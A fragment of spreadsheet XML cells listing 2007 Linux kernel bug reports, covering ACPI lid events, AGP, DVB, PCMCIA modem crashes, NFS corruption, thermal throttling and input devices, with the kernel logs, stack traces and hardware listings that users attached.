    <t>2007-08-25 21:11 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: N/A Distribution: Fedora core 7 with vanilla kernel Hardware Environment: ThinkPad X60, tested with 7 various other machines Software Environment: Stock F7 with vanilla kernel Problem Description: On resume we need to refresh the lid status as we will not get an event if the lid opening was what triggered the suspend. This manifests itself in users never getting a "lid open" event when a suspend happens because of lid close on hardware that supports wake on lid open. This makes userspace gets very confused indeed. Patch attached forces a check of the lid status in the resume handler. Steps to reproduce: 1. install linux 2. start evtest or gnome-power-manager 3. shut lid [machine suspends] 4. open lid [machine resumes] 5. observe no lid open event, userspace still thinks the lid is down 6. shut lid [machine ignores "duplicate event" and does not suspend 7. open lid [machine gets lid up event] 8. shut lid [machine suspends]</t>
  </si>
  <si>
    <t>ati-agp init fails - unsupported ati chipset</t>
  </si>
  <si>
    <t>2007-07-26 13:38 UTC</t>
  </si>
  <si>
    <t>Ben Leggett</t>
  </si>
  <si>
    <t>2009-03-18 08:22 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:None Distribution:Gentoo 2007.0 Problem Description:agpgart: Unsupported Ati chipset (device id: 7831) Fails to recognize AGP chipset. Machine is a Satellite A85-S1072 with Mobility Radeon 9000 IGP. Xorg DRI fails because the kernel AGP module cannot recognize the AGP chipset.</t>
  </si>
  <si>
    <t>Missing channels on LifeView FlyDVB-S LR300</t>
  </si>
  <si>
    <t>2007-07-29 12:40 UTC</t>
  </si>
  <si>
    <t>James Le Cuirot</t>
  </si>
  <si>
    <t>2007-11-08 03:57 UTC</t>
  </si>
  <si>
    <t>I have a FlyDVB-S LR300. I am unable to pick up certain UK channels, particularly any BBC channels (except radio), any ITV channels and Film4. I am able to pick up these channels in Windows, though the driver frequently crashes. That's probably unrelated. I am also able to pick up these channels using a regular Sky box. I have tried many things including adjusting the dish but all to no avail so I am starting to suspect the driver. The frontend is the Philips TDA10086. I will provide any information you require, just ask. I'm also happy to try anything you suggest. I described the problem in more detail on the mailing list here... http://www.linuxtv.org/pipermail/linux-dvb/2007-July/018898.html</t>
  </si>
  <si>
    <t>HUAWEI e630 data cards problem</t>
  </si>
  <si>
    <t>2.6.22.1 (last stable from kernel.org)</t>
  </si>
  <si>
    <t>2007-07-30 12:26 UTC</t>
  </si>
  <si>
    <t>inguna</t>
  </si>
  <si>
    <t>2009-03-18 09:49 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: dont know Distribution: mandriva 2007 Hardware Environment:acer travelmate 2413 nwlmi Software Environment: Problem Description: card really not working - comgt lock up after message "search a device" Steps to reproduce: insert huawei e630 card into pcmcia slot there is dmesg output: pccard: CardBus card inserted into slot 0 yenta EnE: chaning testregister 0xC9, 04 -&gt; 04 ohci_hcd: 2006 August 04 USB 1.1 'Open' Host Controller (OHCI) Driver PCI: Enabling device 0000:07:00.0 (0000 -&gt; 0002) ACPI: PCI Interrupt 0000:07:00.0[A] -&gt; GSI 22 (level, low) -&gt; IRQ 16 PCI: Setting latency timer of device 0000:07:00.0 to 64 ohci_hcd 0000:07:00.0: OHCI Host Controller ohci_hcd 0000:07:00.0: new USB bus registered, assigned bus number 6 ohci_hcd 0000:07:00.0: irq 16, io mem 0x38000000 usb usb6: configuration #1 chosen from 1 choice hub 6-0:1.0: USB hub found hub 6-0:1.0: 1 port detected PCI: Enabling device 0000:07:00.1 (0000 -&gt; 0002) ACPI: PCI Interrupt 0000:07:00.1[B] -&gt; GSI 22 (level, low) -&gt; IRQ 16 PCI: Setting latency timer of device 0000:07:00.1 to 64 ohci_hcd 0000:07:00.1: OHCI Host Controller ohci_hcd 0000:07:00.1: new USB bus registered, assigned bus number 7 ohci_hcd 0000:07:00.1: irq 16, io mem 0x38001000 usb usb7: configuration #1 chosen from 1 choice hub 7-0:1.0: USB hub found hub 7-0:1.0: 1 port detected usb 6-1: new full speed USB device using ohci_hcd and address 2 usb 6-1: configuration #1 chosen from 1 choice usbcore: registered new interface driver usbserial drivers/usb/serial/usb-serial.c: USB Serial support registered for generic usbcore: registered new interface driver usbserial_generic drivers/usb/serial/usb-serial.c: USB Serial Driver core drivers/usb/serial/usb-serial.c: USB Serial support registered for pl2303 pl2303 6-1:1.0: pl2303 converter detected usb 6-1: pl2303 converter now attached to ttyUSB0 pl2303 6-1:1.1: pl2303 converter detected usb 6-1: pl2303 converter now attached to ttyUSB1 pl2303 6-1:1.2: pl2303 converter detected usb 6-1: pl2303 converter now attached to ttyUSB2 usbcore: registered new interface driver pl2303 drivers/usb/serial/pl2303.c: Prolific PL2303 USB to serial adaptor driver drivers/usb/serial/usb-serial.c: USB Serial support registered for GSM modem (1-port) usbcore: registered new interface driver option drivers/usb/serial/option.c: USB Driver for GSM modems: v0.7.1 BUG: unable to handle kernel NULL pointer dereference at virtual address 0000001c printing eip: e05a58e6 *pde = 00000000 Oops: 0002 [#1] SMP Modules linked in: option pl2303 usbserial ohci_hcd nls_cp437 nls_iso8859_1 smbfs i915 drm snd_seq_dummy nfsd snd_seq_oss snd_seq_midi_event exportfs snd_seq lockd snd_seq_device nfs_acl sunrpc snd_pcm_oss snd_mixer_oss snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_timer snd_page_alloc snd soundcore ipv6 8139too mii af_packet ide_cd loop nls_utf8 ntfs dm_mod video thermal processor fan container button battery ac pcmcia yenta_socket rsrc_nonstatic pcmcia_core intel_agp agpgart nvram ehci_hcd uhci_hcd usbcore evdev joydev tsdev CPU: 0 EIP: 0060:[&lt;e05a58e6&gt;] Not tainted VLI EFLAGS: 00010246 (2.6.22.1 #2) EIP is at pl2303_open+0x456/0x9e0 [pl2303] eax: 00000000 ebx: 00000000 ecx: 00000000 edx: c6493800 esi: c9606440 edi: ccba4800 ebp: cc2b7e70 esp: cc2b7e14 ds: 007b es: 007b fs: 00d8 gs: 0033 ss: 0068 Process hald-probe-seri (pid: 22697, ti=cc2b6000 task=cc0ca560 task.ti=cc2b6000) Stack: 00000040 00000009 00000000 00000000 00000000 00000064 cc2b7e4c c0120b80 ceb1b3a0 00000000 00000003 00000000 c0921000 ca255e00 cc2b7e58 c025f24a 00000000 cc2b7e9c c025ff0f c9606440 ccba4800 c9606440 c0921000 cc2b7e9c Call Trace: [&lt;c01050aa&gt;] show_trace_log_lvl+0x1a/0x30 [&lt;c0105171&gt;] show_stack_log_lvl+0xb1/0xe0 [&lt;c0105372&gt;] show_registers+0x1d2/0x2e0 [&lt;c0105594&gt;] die+0x114/0x270 [&lt;c011f09b&gt;] do_page_fault+0x2cb/0x5d0 [&lt;c033cdea&gt;] error_code+0x72/0x78 [&lt;e06952cc&gt;] serial_open+0xfc/0x150 [usbserial] [&lt;c0262f5b&gt;] tty_open+0x14b/0x2e0 [&lt;c017f653&gt;] chrdev_open+0xa3/0x190 [&lt;c017b2ab&gt;] __dentry_open+0xab/0x1a0 [&lt;c017b445&gt;] nameidata_to_filp+0x35/0x40 [&lt;c017b499&gt;] do_filp_open+0x49/0x50 [&lt;c017b4e7&gt;] do_sys_open+0x47/0xd0 [&lt;c017b5ac&gt;] sys_open+0x1c/0x20 [&lt;c0104086&gt;] sysenter_past_esp+0x5f/0x85 ======================= Code: 1c 8b 47 44 ba d0 00 00 00 e8 f7 70 ab ff 85 c0 89 c3 0f 85 24 05 00 00 8b 0d 80 99 5a e0 85 c9 0f 85 37 04 00 00 8b 47 24 8b 16 &lt;89&gt; 50 1c 8b 47 24 ba d0 00 00 00 e8 ca 70 ab ff 89 c3 31 c0 85 EIP: [&lt;e05a58e6&gt;] pl2303_open+0x456/0x9e0 [pl2303] SS:ESP 0068:cc2b7e14 BUG: unable to handle kernel NULL pointer dereference at virtual address 0000001c printing eip: e05a58e6 *pde = 00000000 Oops: 0002 [#2] SMP Modules linked in: option pl2303 usbserial ohci_hcd nls_cp437 nls_iso8859_1 smbfs i915 drm snd_seq_dummy nfsd snd_seq_oss snd_seq_midi_event exportfs snd_seq lockd snd_seq_device nfs_acl sunrpc snd_pcm_oss snd_mixer_oss snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_timer snd_page_alloc snd soundcore ipv6 8139too mii af_packet ide_cd loop nls_utf8 ntfs dm_mod video thermal processor fan container button battery ac pcmcia yenta_socket rsrc_nonstatic pcmcia_core intel_agp agpgart nvram ehci_hcd uhci_hcd usbcore evdev joydev tsdev CPU: 0 EIP: 0060:[&lt;e05a58e6&gt;] Not tainted VLI EFLAGS: 00010246 (2.6.22.1 #2) EIP is at pl2303_open+0x456/0x9e0 [pl2303] eax: 00000000 ebx: 00000000 ecx: 00000000 edx: c6493800 esi: c9606500 edi: c25f7a00 ebp: cc2e1e70 esp: cc2e1e14 ds: 007b es: 007b fs: 00d8 gs: 0033 ss: 0068 Process hald-probe-seri (pid: 22733, ti=cc2e0000 task=cfdbfa90 task.ti=cc2e0000) Stack: 00000040 00000009 00000000 00000000 00000000 00000064 cc2e1e4c c0120b80 dcf2ba20 00000000 00000003 00000000 c0922000 ca255e00 cc2e1e58 c025f24a 00000000 cc2e1e9c c025ff0f c9606500 c25f7a00 c9606500 c0922000 cc2e1e9c Call Trace: [&lt;c01050aa&gt;] show_trace_log_lvl+0x1a/0x30 [&lt;c0105171&gt;] show_stack_log_lvl+0xb1/0xe0 [&lt;c0105372&gt;] show_registers+0x1d2/0x2e0 [&lt;c0105594&gt;] die+0x114/0x270 [&lt;c011f09b&gt;] do_page_fault+0x2cb/0x5d0 [&lt;c033cdea&gt;] error_code+0x72/0x78 [&lt;e06952cc&gt;] serial_open+0xfc/0x150 [usbserial] [&lt;c0262f5b&gt;] tty_open+0x14b/0x2e0 [&lt;c017f653&gt;] chrdev_open+0xa3/0x190 [&lt;c017b2ab&gt;] __dentry_open+0xab/0x1a0 [&lt;c017b445&gt;] nameidata_to_filp+0x35/0x40 [&lt;c017b499&gt;] do_filp_open+0x49/0x50 [&lt;c017b4e7&gt;] do_sys_open+0x47/0xd0 [&lt;c017b5ac&gt;] sys_open+0x1c/0x20 [&lt;c0104086&gt;] sysenter_past_esp+0x5f/0x85 ======================= Code: 1c 8b 47 44 ba d0 00 00 00 e8 f7 70 ab ff 85 c0 89 c3 0f 85 24 05 00 00 8b 0d 80 99 5a e0 85 c9 0f 85 37 04 00 00 8b 47 24 8b 16 &lt;89&gt; 50 1c 8b 47 24 ba d0 00 00 00 e8 ca 70 ab ff 89 c3 31 c0 85 EIP: [&lt;e05a58e6&gt;] pl2303_open+0x456/0x9e0 [pl2303] SS:ESP 0068:cc2e1e14 there is lsmod: [root@localhost gazella]# lsmod Module Size Used by option 12544 0 pl2303 22916 2 usbserial 33256 6 option,pl2303 ohci_hcd 23172 0 nls_cp437 9728 3 nls_iso8859_1 8064 3 smbfs 61432 3 i915 25856 2 drm 75668 3 i915 snd_seq_dummy 6788 0 nfsd 213488 17 snd_seq_oss 33152 0 snd_seq_midi_event 10240 1 snd_seq_oss exportfs 8704 1 nfsd snd_seq 50256 5 snd_seq_dummy,snd_seq_oss,snd_seq_midi_event lockd 63624 2 nfsd snd_seq_device 10636 3 snd_seq_dummy,snd_seq_oss,snd_seq nfs_acl 7040 1 nfsd sunrpc 151932 12 nfsd,lockd,nfs_acl snd_pcm_oss 42272 0 snd_mixer_oss 17920 1 snd_pcm_oss snd_intel8x0 32796 1 snd_ac97_codec 99620 1 snd_intel8x0 ac97_bus 6144 1 snd_ac97_codec snd_pcm 72068 3 snd_pcm_oss,snd_intel8x0,snd_ac97_codec snd_timer 22660 2 snd_seq,snd_pcm snd_page_alloc 11656 2 snd_intel8x0,snd_pcm snd 48100 11 snd_seq_oss,snd_seq,snd_seq_device,snd_pcm_oss,snd_mixer_oss,snd_intel8x0,snd_ac97_codec,snd_pcm,snd_timer soundcore 9952 1 snd ipv6 249892 18 8139too 25728 0 mii 8704 1 8139too af_packet 24200 2 ide_cd 38688 1 loop 17412 0 nls_utf8 5888 3 ntfs 101568 1 dm_mod 51264 0 video 18440 0 thermal 14856 0 processor 29160 1 thermal fan 7684 0 container 7424 0 button 10128 0 battery 12292 0 ac 7940 0 pcmcia 36780 0 yenta_socket 26892 2 rsrc_nonstatic 14848 1 yenta_socket pcmcia_core 36756 3 pcmcia,yenta_socket,rsrc_nonstatic intel_agp 25364 1 agpgart 31048 3 drm,intel_agp nvram 11400 0 ehci_hcd 33548 0 uhci_hcd 25872 0 usbcore 121224 7 option,pl2303,usbserial,ohci_hcd,ehci_hcd,uhci_hcd evdev 11904 2 joydev 12352 0 tsdev 10560 0 [root@localhost gazella]# there - lspci 00:00.0 Host bridge: Intel Corporation Mobile 915GM/PM/GMS/910GML Express Processor to DRAM Controller (rev 03) 00:02.0 VGA compatible controller: Intel Corporation Mobile 915GM/GMS/910GML Express Graphics Controller (rev 03) 00:02.1 Display controller: Intel Corporation Mobile 915GM/GMS/910GML Express Graphics Controller (rev 03) 00:1d.0 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #1 (rev 03) 00:1d.1 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #2 (rev 03) 00:1d.2 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #3 (rev 03) 00:1d.3 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #4 (rev 03) 00:1d.7 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB2 EHCI Controller (rev 03) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev d3) 00:1e.2 Multimedia audio controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) AC'97 Audio Controller (rev 03) 00:1e.3 Modem: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) AC'97 Modem Controller (rev 03) 00:1f.0 ISA bridge: Intel Corporation 82801FBM (ICH6M) LPC Interface Bridge (rev 03) 00:1f.1 IDE interface: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) IDE Controller (rev 03) 00:1f.3 SMBus: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) SMBus Controller (rev 03) 06:05.0 Network controller: Broadcom Corporation BCM4318 [AirForce One 54g] 802.11g Wireless LAN Controller (rev 02) 06:07.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) 06:09.0 CardBus bridge: ENE Technology Inc CB1410 Cardbus Controller (rev 01) 07:00.0 USB Controller: NEC Corporation USB (rev 43) 07:00.1 USB Controller: NEC Corporation USB (rev 43) i also a serrch in internet,and i found, this problem is http://lists.debian.org/debian-kernel/2007/06/msg00013.html i e a kernel 2.6.18 also have a this problem.</t>
  </si>
  <si>
    <t>boot hang unless "pci=nommconf" - HP DC 7700</t>
  </si>
  <si>
    <t>2.6.20.1, 2.6.22.1</t>
  </si>
  <si>
    <t>2007-08-01 03:22 UTC</t>
  </si>
  <si>
    <t>8308 9127</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: ? Distribution: Debian Hardware Environment: Software Environment: PXE-booted kernel, with some custom initrd --- Problem Description: Kernel doesn't boot, unless "acpi=off" or "pci=conf1" is given. "acpi=force", "acpi=strict", "acpi=ht", "acpi=noirq", "pci=noacpi", "noapic hda=noprobe hdc=noprobe" don't help. --- Last messages (typed, are abbreviated): ACPI: bus type pci registered PCI: using MMConfig Setting up standard PCI resources evgpeblk-0952 [04] ev_create_gpe_block: GPE00 to 1F [_GPE] 4 regs on int 0x9 evgpeblk-1048 [03] ev_initialize_gpe_block: Found 9 Wake, Enabled 1 Runtime GPEs in this block Completing Region/Field/Buffer/Package init.: ..... Init. 27/29 Regions 0/0 Fields 57/57 Buffers 14/23 Packages (729 nodes) Init Dev./Proc/Thermal Objects by exec. _INI methods:.. Exec. 2 _INI methods require 0 _STA exec. (examined 58 obj) ACPI: interpreter enabled ACPI: (supports S0 S3 S4 S5) ACPI: Using IOAPIC for int. rout. ACPI: PCI Root Bridge [PCI0] (0000:00) --- Steps to reproduce: Boot kernel. --- Dumps get attached.</t>
  </si>
  <si>
    <t>No stereo output until volume slider is moved</t>
  </si>
  <si>
    <t>2.6.20-16-generic</t>
  </si>
  <si>
    <t>2007-08-02 01:36 UTC</t>
  </si>
  <si>
    <t>Chris</t>
  </si>
  <si>
    <t>2008-09-24 06:46 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Distribution: Ubuntu Feisty Hardware Environment: M-Audio Revolution 7.1 and Realtek Software Environment: Gnome 2.18.1 Problem Description: When I first login sound is only coming from the right speaker. To get sound out of the left speaker I have to nudge the volume slider in the mixer, and then sound is in stereo from then on until the computer is shut down, then the whole process repeats. Steps to reproduce: 1. Turn on computer and login 2. Play any file with audio 3. Nudge volume slider while file is playing https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=249988 https://bugs.launchpad.net/fedora/+source/alsa-lib/+bug/110481</t>
  </si>
  <si>
    <t>Random data in files created on NFS (over OCFS2 over DRBD)</t>
  </si>
  <si>
    <t>2.6.22.1 SMP X64</t>
  </si>
  <si>
    <t>2007-08-02 02:36 UTC</t>
  </si>
  <si>
    <t>Pawel Zawora</t>
  </si>
  <si>
    <t>2008-02-25 17:22 UTC</t>
  </si>
  <si>
    <t>Mark Fasheh</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.21.6 Distribution: very custom based on slackware (quite old glibc 2.3 gcc 3.4) Hardware Environment: MB: 2 opteron X64 raid controler 3com series 95XX Software Environment: OCFS2 over DRBD 8.0.4 (active/active) over hardware raid volume NFS servers (version 1.1 from source) Problem Description: NFS shares ocfs2 file systems. Problem appears on NFS3 and NFS4 (both over tcp ) When I write to file over NFS - content of the file is destroyed and contains random bytes. Size of file is preserved. Kernel report no errors. Read works correctly. File written directly on nfs server is OK (I can read it on server and client station). On the same server NFS over reiserfs works correctly. Steps to reproduce: try to mount nfs share on client workstation, and execute echo "test" &gt;&gt; mytestfile</t>
  </si>
  <si>
    <t>thermal throttling at 50C impacts performance - AOpen i915GMm-hfs, Pentium-M 750</t>
  </si>
  <si>
    <t>2007-08-04 00:09 UTC</t>
  </si>
  <si>
    <t>Knut Petersen</t>
  </si>
  <si>
    <t>2007-08-13 21:42 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.21 Distribution: openSuSE 10.2 Hardware Environment: AOpen i915GMm-hfs mainboard, Pentium-M 750. Although a Pentium M and a mobile chipset is used, don´t believe that this is a laptop. It´s a normal ATX board for server/desktop/htpc use! Problem Description: The mainboard BIOS is broken, but that was not a problem as long as it was possible to provide thermal.c with some more reasonable data by writing to the trip_points file. Now there is a 50% performance regression - kernel compile time increase: 2.6.21: 12min, 2.6.22.1 18 min. mainboard details ------------------ thermal.c is unable to control the cpu fan and complains about that: ACPI: Unable to turn cooling device [c18dc9dc] 'on' bus-0201 [-411] bus_set_power: Device `[PNP0C0B:00]' is not power manageable The BIOS provides the following trip points for both passive and active cooling mode: critical (S5): 100 C passive: 50 C: tc1=4 tc2=3 tsp=60 devices=CPU0 active[0]: 50 C: devices= FAN These trip points are stored as dK values in the BIOS data: DSDT: OperationRegion (TEMM, SystemMemory, 0x000FF810, 0x0C) linux:~ # hexdump -C -s 0x000FF810 -n 12 /dev/mem 000ff810 a0 0c 6e 0c a0 0c 6e 0c 94 0e 01 00 |..n...n.....| The BIOS will turn on the cpu fan a bit above 50 degrees Celsius, but the passive cooling of thermal.c slows down the cpu before that occures. Linux problems -------------- The cause is commit 11ccc0f249cb01a129f54760b8ff087f242935d4, removing te possibility to write to the trip_points file. In kernels up to 2.6.21 it was possible to use the following trip point setup critical (S5): 100 C passive: 60 C: tc1=4 tc2=3 tsp=60 devices=CPU0 active[0]: 70 C: devices= FAN The result was that the BIOS would switch on the fan early enough that neither passive nor active cooling of thermal.c would be activated as long as the fan was working properly. But in case of fan failure my system would have been still in a slower but safe state at about 60 degrees Celsius, ensured by passive cooling code in thermal.c. That is not possible any longer with kernel 2.6.22. Maybe the BIOS would save my system at 100 degrees Celsius, but I definitely will not test that.</t>
  </si>
  <si>
    <t>atkbd.c: Unknown key pressed (translated set 2, code 0xf8 on isa0060/serio0).</t>
  </si>
  <si>
    <t>2007-08-06 10:22 UTC</t>
  </si>
  <si>
    <t>2007-09-05 19:56 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Ubuntu Gutsy tribe 3 Hardware Environment: Laptop Software Environment: Default Problem Description: I press button of WiFi and message: [ 1306.342289] atkbd.c: Unknown key pressed (translated set 2, code 0xf8 on isa0060/serio0). [ 1306.342295] atkbd.c: Use 'setkeycodes e078 &lt;keycode&gt;' to make it known. Steps to reproduce: 1) Run live cd of Ubuntu Gutsy Tribe 3 2) Install driver bcm43xx 3) Press button of "on" and "off"</t>
  </si>
  <si>
    <t>(pata HPT370) UDMA100 mode isn't available since LibATA has been incorporated to the kernel</t>
  </si>
  <si>
    <t>2007-08-06 22:59 UTC</t>
  </si>
  <si>
    <t>IvankoB</t>
  </si>
  <si>
    <t>2007-11-11 17:38 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17 Distribution: Linux Debian 3.1 Sarge Hardware Environment: m/b ABIT BE6-II ( HPT BIOS updated for LBA48), HDD Seagate ST3160212A 160GB PATA firmware version 3AAJ Software Environment: GRUB boot loader Problem Description: HPT370 max UDMA mode is UDMA66 with the IDE (non-experimantal) driver, and UDMA44 with the LibATA (experimantal) one. Steps to reproduce: just boot with kernel newer than 2.6.17. The drive is bootable. The GIT versions of kernel ( containing some HPT patches ) don't fix the problem.</t>
  </si>
  <si>
    <t>Thinkpad-acpi fails to load on Lenovo 3000 V200 (Santa Rosa)</t>
  </si>
  <si>
    <t>2.6.23-rc2</t>
  </si>
  <si>
    <t>2007-08-07 00:27 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: none - new machine Distribution: Debian, but kernel off of kernel.org Hardware Environment: Lenovo 3000 V200 Software Environment: Problem Description: When I modprobe thinkpad_acpi I get: Non-volatile memory driver v1.2 WARNING: at lib/kref.c:33 kref_get() [&lt;c01ccd89&gt;] kref_get+0x34/0x3f [&lt;c01cc212&gt;] kobject_get+0xf/0x13 [&lt;c022d9c3&gt;] get_driver+0xe/0x14 [&lt;c022d9d4&gt;] driver_remove_file+0xb/0x25 [&lt;f8c70943&gt;] thinkpad_acpi_module_exit+0x90/0xd9 [thinkpad_acpi] [&lt;f8c2c71d&gt;] thinkpad_acpi_module_init+0x6de/0x708 [thinkpad_acpi] [&lt;c011e60e&gt;] default_wake_function+0x0/0xc [&lt;c013f25c&gt;] __link_module+0x0/0x1f [&lt;c0141717&gt;] sys_init_module+0x146b/0x15a4 [&lt;c02082d8&gt;] acpi_bus_register_driver+0x0/0x38 [&lt;c0103e8e&gt;] syscall_call+0x7/0xb ======================= WARNING: at lib/kref.c:33 kref_get() [&lt;c01ccd89&gt;] kref_get+0x34/0x3f [&lt;c01cc212&gt;] kobject_get+0xf/0x13 [&lt;c022d9c3&gt;] get_driver+0xe/0x14 [&lt;c022d9d4&gt;] driver_remove_file+0xb/0x25 [&lt;f8c70943&gt;] thinkpad_acpi_module_exit+0x90/0xd9 [thinkpad_acpi] [&lt;f8c2c71d&gt;] thinkpad_acpi_module_init+0x6de/0x708 [thinkpad_acpi] [&lt;c011e60e&gt;] default_wake_function+0x0/0xc [&lt;c013f25c&gt;] __link_module+0x0/0x1f [&lt;c0141717&gt;] sys_init_module+0x146b/0x15a4 [&lt;c02082d8&gt;] acpi_bus_register_driver+0x0/0x38 [&lt;c0103e8e&gt;] syscall_call+0x7/0xb ======================= WARNING: at lib/kref.c:33 kref_get() [&lt;c01ccd89&gt;] kref_get+0x34/0x3f [&lt;c01cc212&gt;] kobject_get+0xf/0x13 [&lt;c022d9c3&gt;] get_driver+0xe/0x14 [&lt;c022d9d4&gt;] driver_remove_file+0xb/0x25 [&lt;f8c70943&gt;] thinkpad_acpi_module_exit+0x90/0xd9 [thinkpad_acpi] [&lt;f8c2c71d&gt;] thinkpad_acpi_module_init+0x6de/0x708 [thinkpad_acpi] [&lt;c011e60e&gt;] default_wake_function+0x0/0xc [&lt;c013f25c&gt;] __link_module+0x0/0x1f [&lt;c0141717&gt;] sys_init_module+0x146b/0x15a4 [&lt;c02082d8&gt;] acpi_bus_register_driver+0x0/0x38 [&lt;c0103e8e&gt;] syscall_call+0x7/0xb ======================= lp: driver loaded but no devices found The ACPI info on boot is: ACPI: RSDP 000F7F80, 0024 (r2 LENOVO) ACPI: XSDT 7F6D7C06, 0094 (r1 LENOVO TP-65 6040000 LTP 0) ACPI: FACP 7F6DFBD2, 00F4 (r3 LENOVO TP-65 6040000 ALAN 1) ACPI: DSDT 7F6D9170, 69EE (r2 LENOVO TP-65 6040000 MSFT 2000001) ACPI: FACS 7F6E2FC0, 0040 ACPI: APIC 7F6DFCC6, 0068 (r1 INTEL CRESTLNE 6040000 LOHR 5A) ACPI: HPET 7F6DFD2E, 0038 (r1 INTEL CRESTLNE 6040000 LOHR 5A) ACPI: MCFG 7F6DFD66, 003C (r1 INTEL CRESTLNE 6040000 LOHR 5A) ACPI: TCPA 7F6DFDA2, 0032 (r1 Intel CRESTLN 6040000 5A52) ACPI: SLIC 7F6DFDD4, 0176 (r1 LENOVO TP-65 6040000 LNVO 1) ACPI: TMOR 7F6DFF4A, 0026 (r1 PTLTD 6040000 PTL 3) ACPI: APIC 7F6DFF70, 0068 (r1 PTLTD APIC 6040000 LTP 0) ACPI: BOOT 7F6DFFD8, 0028 (r1 PTLTD $SBFTBL$ 6040000 LTP 1) ACPI: SSDT 7F6D8E93, 02DD (r1 SataRe SataAhci 1000 INTL 20050624) ACPI: SSDT 7F6D8CF6, 019D (r1 BrtRef DD01BRT 1000 INTL 20050624) ACPI: SSDT 7F6D8226, 025F (r1 PmRef Cpu0Tst 3000 INTL 20050624) ACPI: SSDT 7F6D8180, 00A6 (r1 PmRef Cpu1Tst 3000 INTL 20050624) ACPI: SSDT 7F6D7C9A, 04E6 (r1 PmRef CpuPm 3000 INTL 20050624) ACPI: BIOS bug: multiple APIC/MADT found, using 0 ACPI: If "acpi_apic_instance=2" works better, notify linux-acpi@vger.kernel.org ACPI: PM-Timer IO Port: 0x1008 ACPI: Local APIC address 0xfee00000 ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled) Processor #0 6:15 APIC version 20 ACPI: LAPIC (acpi_id[0x01] lapic_id[0x01] enabled) Processor #1 6:15 APIC version 20 ACPI: LAPIC_NMI (acpi_id[0x00] high edge lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x01] high edge lint[0x1]) ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0]) IOAPIC[0]: apic_id 1, version 32, address 0xfec00000, GSI 0-23 ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level) ACPI: IRQ0 used by override. ACPI: IRQ2 used by override. etc.... Original motivation: the notebook's switch-display (external/internal) does not work. Steps to reproduce: modprobe thinkpad_acpi</t>
  </si>
  <si>
    <t>PS/2 mouse not detected on MS Virtual PC 2007</t>
  </si>
  <si>
    <t>2007-08-07 06:15 UTC</t>
  </si>
  <si>
    <t>Graham Knap</t>
  </si>
  <si>
    <t>2009-03-23 11:29 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.18 Distribution: Debian Hardware Environment: MS Virtual PC 2007 Software Environment: Debian "testing" Problem Description: PS/2 mouse not detected on MS Virtual PC 2007 Steps to reproduce: When Linux 2.6.18 boots, I get these messages: --- PNP: PS/2 Controller [PNP0303:PS2K,PNP0f03:PS2M] at 0x60,0x64 irq 1,12 serio: i8042 AUX port at 0x60,0x64 irq 12 serio: i8042 KBD port at 0x60,0x64 irq 1 --- but with the 2.6.21 or 2.6.22 kernel, I don't see the "AUX port" line, and the mouse is not detected. Sorry, I didn't get a chance to test with 2.6.19 or .20. Forwarded from: http://bugs.debian.org/433815</t>
  </si>
  <si>
    <t>Thinkpad R61 ALPS-pad and trackpointer undetected</t>
  </si>
  <si>
    <t>2007-08-08 11:37 UTC</t>
  </si>
  <si>
    <t>Christian Birchinger</t>
  </si>
  <si>
    <t>2009-06-25 16:33 UTC</t>
  </si>
  <si>
    <t>My Thinkpad R61 has an ALPS pad and a trackpointer (UltraNav). The devices only get detected as generic PS/2 mouse though. I enabled the DEBUG mode of the "alps.c" driver and attached the info below. The trackpointer also remains undetected. "trackpoint.c" has no debug mode, so i can't really attach usefull infos. Also, the content in "/sys/devices/platform/i8042/" doesn't seem to have any of the special info which are described on: http://www.thinkwiki.org/wiki/Patch_to_enable_advanced_trackpoint_configuration I'm using 2.6.22.1 and also tried a 2.6.19 Gentoo LiveCD to be sure it's not a new behaviour. I also attached the whole dmesg becuase serio/i8042 could prevent something from showing up maybe. Thanks Christian Birchinger Model: ------ Thinkpad R61 8918-5QG /proc/bus/input/devices: ------------------------ I: Bus=0011 Vendor=0002 Product=0001 Version=0000 N: Name="PS/2 Generic Mouse" P: Phys=isa0060/serio1/input0 S: Sysfs=/class/input/input5 U: Uniq= H: Handlers=mouse0 event5 B: EV=7 B: KEY=70000 0 0 0 0 B: REL=3 alps.c (#define DEBUG) kernel log (triggered by modprobe psmouse): ------------------------------------------------------------------ alps.c: E6 report: 00 00 64 alps.c: E7 report: 73 00 0a input: PS/2 Generic Mouse as /class/input/input10 ls -R /sys/devices/platform/i8042/: ----------------------------------- /sys/devices/platform/i8042/: driver@ modalias power/ serio0/ serio1/ 